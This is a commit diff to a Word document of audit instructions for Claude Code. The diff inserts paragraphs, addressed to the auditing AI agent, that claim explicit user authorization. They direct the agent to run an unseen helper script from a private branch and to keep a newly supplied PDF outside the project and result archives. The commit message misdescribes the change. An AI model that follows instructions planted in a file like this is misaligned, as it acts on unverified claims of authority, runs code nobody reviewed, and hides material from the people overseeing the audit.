<commit_message>
Provide verified private reference branch access and restore zero-PDF application guard
</commit_message>
<xml_diff>
--- a/audit/claude-code-comprehensive-2026-10-19/desktop-downloads/CLAUDE_AUDIT_INSTRUCTIONS.docx
+++ b/audit/claude-code-comprehensive-2026-10-19/desktop-downloads/CLAUDE_AUDIT_INSTRUCTIONS.docx
@@ -3,11 +3,18 @@
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:body>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Title"/>
-      </w:pPr>
       <w:r>
-        <w:t>Claude Code comprehensive audit instructions</w:t>
+        <w:t>CURRENT PRIVATE REFERENCE UPDATE — 2026-10-19T01:30:57.437018+00:00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The user has explicitly authorized private GitHub storage of the new reference. Before auditing,read audit/claude-code-comprehensive-2026-10-19/PRIVATE_REFERENCE_ACCESS.md and run its fetch_private_reference.py helper from the updated checkout. Book storage is isolated on private branch private-reference/penguin-2bcc0c45,commit df76700be64b9fe409dd02f7b5d0c8903a910517;do not merge it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The current newly supplied PDF is 13596737bytes,SHA256 2bcc0c45fac4508adf283f4dd939a7e578cf2c1306fdadf4966300532beb6303. It differs from the earlier0c441ffd/13572361-byte input. This update selects the new user-supplied input for the current audit;older reference-pin statements in the historical instructions below describe different bytes and do not establish continuity. Record the actual new input and independently check edition/alignment. Keep the local PDF/extracted prose outside the project and result archives. Application target dc8aa6effa931cf0ba554042b92d49ef5e4a4b72 is unchanged.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21,11 +28,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
       <w:r>
-        <w:t>Claude Code comprehensive independent audit — copy and paste</w:t>
+        <w:t># Claude Code comprehensive independent audit — copy and paste</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -80,11 +84,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
       <w:r>
-        <w:t>Independent comprehensive diagnostic audit — Claude Code — requested Opus 5.5 / Extra</w:t>
+        <w:t># Independent comprehensive diagnostic audit — Claude Code — requested Opus 5.5 / Extra</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -654,7 +655,6 @@
     <w:qFormat/>
     <w:rsid w:val="00FC693F"/>
     <w:rPr>
-      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
       <w:sz w:val="20"/>
     </w:rPr>
   </w:style>

</xml_diff>